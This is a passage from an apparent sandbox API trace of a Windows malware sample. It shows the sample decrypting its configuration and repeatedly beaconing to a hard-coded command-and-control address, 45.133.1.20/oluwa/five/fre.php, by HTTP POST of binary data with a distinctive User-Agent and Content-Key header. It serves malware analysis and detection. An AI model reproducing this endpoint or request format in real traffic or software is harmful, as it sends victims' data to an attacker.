Flags=0x0, Size=0x40) returned 0x6b4d48 [0178.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.708] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0178.723] GetProcessHeap () returned 0x6a0000 [0178.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.725] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0178.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.726] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.727] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.727] GetProcessHeap () returned 0x6a0000 [0178.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.729] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0178.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.733] CryptDestroyKey (hKey=0x6ad020) returned 1 [0178.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.735] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0178.735] GetProcessHeap () returned 0x6a0000 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.736] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0178.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.737] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0178.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.739] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0178.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.740] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0178.740] GetProcessHeap () returned 0x6a0000 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0178.740] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9c08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0178.740] GetProcessHeap () returned 0x6a0000 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0178.740] socket (af=2, type=1, protocol=6) returned 0x3c4 [0178.741] connect (s=0x3c4, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0178.779] FreeAddrInfoW (pAddrInfo=0x6b9c08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0178.779] GetProcessHeap () returned 0x6a0000 [0178.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0178.779] GetProcessHeap () returned 0x6a0000 [0178.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0178.781] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.782] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.782] GetProcessHeap () returned 0x6a0000 [0178.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0178.782] GetProcessHeap () returned 0x6a0000 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.786] GetProcessHeap () returned 0x6a0000 [0178.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0178.787] GetProcessHeap () returned 0x6a0000 [0178.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0178.787] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.789] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.789] GetProcessHeap () returned 0x6a0000 [0178.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0178.789] GetProcessHeap () returned 0x6a0000 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.790] send (s=0x3c4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0178.791] send (s=0x3c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0178.795] GetProcessHeap () returned 0x6a0000 [0178.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0178.795] recv (in: s=0x3c4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0178.870] GetProcessHeap () returned 0x6a0000 [0178.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0178.875] GetProcessHeap () returned 0x6a0000 [0178.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.876] GetProcessHeap () returned 0x6a0000 [0178.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0178.893] GetProcessHeap () returned 0x6a0000 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0178.893] closesocket (s=0x3c4) returned 0 [0178.894] GetProcessHeap () returned 0x6a0000 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0178.894] GetProcessHeap () returned 0x6a0000 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.895] GetProcessHeap () returned 0x6a0000 [0178.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0178.896] GetProcessHeap () returned 0x6a0000 [0178.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0178.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x798) returned 0x3c4 [0178.899] Sleep (dwMilliseconds=0xea60) [0178.900] GetProcessHeap () returned 0x6a0000 [0178.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0178.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0178.958] GetProcessHeap () returned 0x6a0000 [0178.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.959] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0178.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.960] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.961] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.961] GetProcessHeap () returned 0x6a0000 [0178.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.964] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0178.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.965] CryptDestroyKey (hKey=0x6ad020) returned 1 [0178.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.966] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0178.966] GetProcessHeap () returned 0x6a0000 [0178.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.968] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.969] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.971] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.972] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.972] GetProcessHeap () returned 0x6a0000 [0178.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0178.972] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.972] GetProcessHeap () returned 0x6a0000 [0178.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0178.974] GetProcessHeap () returned 0x6a0000 [0178.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.974] GetProcessHeap () returned 0x6a0000 [0178.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.975] GetProcessHeap () returned 0x6a0000 [0178.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0178.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0178.994] GetProcessHeap () returned 0x6a0000 [0178.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0178.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.995] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.997] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.997] GetProcessHeap () returned 0x6a0000 [0178.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0178.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.000] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0179.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.001] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.002] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0179.002] GetProcessHeap () returned 0x6a0000 [0179.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.003] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0179.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.004] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0179.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.005] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0179.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.007] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0179.007] GetProcessHeap () returned 0x6a0000 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0179.007] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9ff0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0179.007] GetProcessHeap () returned 0x6a0000 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0179.007] socket (af=2, type=1, protocol=6) returned 0x3c8 [0179.007] connect (s=0x3c8, name=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0179.040] FreeAddrInfoW (pAddrInfo=0x6b9ff0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0179.040] GetProcessHeap () returned 0x6a0000 [0179.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0179.040] GetProcessHeap () returned 0x6a0000 [0179.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0179.041] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.042] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.042] GetProcessHeap () returned 0x6a0000 [0179.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0179.042] GetProcessHeap () returned 0x6a0000 [0179.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.043] GetProcessHeap () returned 0x6a0000 [0179.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0179.043] GetProcessHeap () returned 0x6a0000 [0179.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0179.044] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.045] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.045] GetProcessHeap () returned 0x6a0000 [0179.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0179.045] GetProcessHeap () returned 0x6a0000 [0179.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.045] send (s=0x3c8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0179.047] send (s=0x3c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0179.047] GetProcessHeap () returned 0x6a0000 [0179.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0179.047] recv (in: s=0x3c8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0179.121] GetProcessHeap () returned 0x6a0000 [0179.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0179.122] GetProcessHeap () returned 0x6a0000 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.123] GetProcessHeap () returned 0x6a0000 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0179.123] GetProcessHeap () returned 0x6a0000 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0179.123] closesocket (s=0x3c8) returned 0 [0179.126] GetProcessHeap () returned 0x6a0000 [0179.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0179.126] GetProcessHeap () returned 0x6a0000 [0179.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.127] GetProcessHeap () returned 0x6a0000 [0179.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0179.127] GetProcessHeap () returned 0x6a0000 [0179.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0179.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8d4) returned 0x3c8 [0179.144] Sleep (dwMilliseconds=0xea60) [0179.157] GetProcessHeap () returned 0x6a0000 [0179.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0179.248] GetProcessHeap () returned 0x6a0000 [0179.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9b48 [0179.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.249] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9b48, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.251] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.252] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.252] GetProcessHeap () returned 0x6a0000 [0179.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b48 | out: hHeap=0x6a0000) returned 1 [0179.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.254] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.256] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.257] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0179.257] GetProcessHeap () returned 0x6a0000 [0179.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.262] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.263] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.264] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.265] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.265] GetProcessHeap () returned 0x6a0000 [0179.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0179.265] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.266] GetProcessHeap () returned 0x6a0000 [0179.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0179.267] GetProcessHeap () returned 0x6a0000 [0179.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.267] GetProcessHeap () returned 0x6a0000 [0179.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.267] GetProcessHeap () returned 0x6a0000 [0179.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.294] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0179.324] GetProcessHeap () returned 0x6a0000 [0179.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0179.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.326] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, 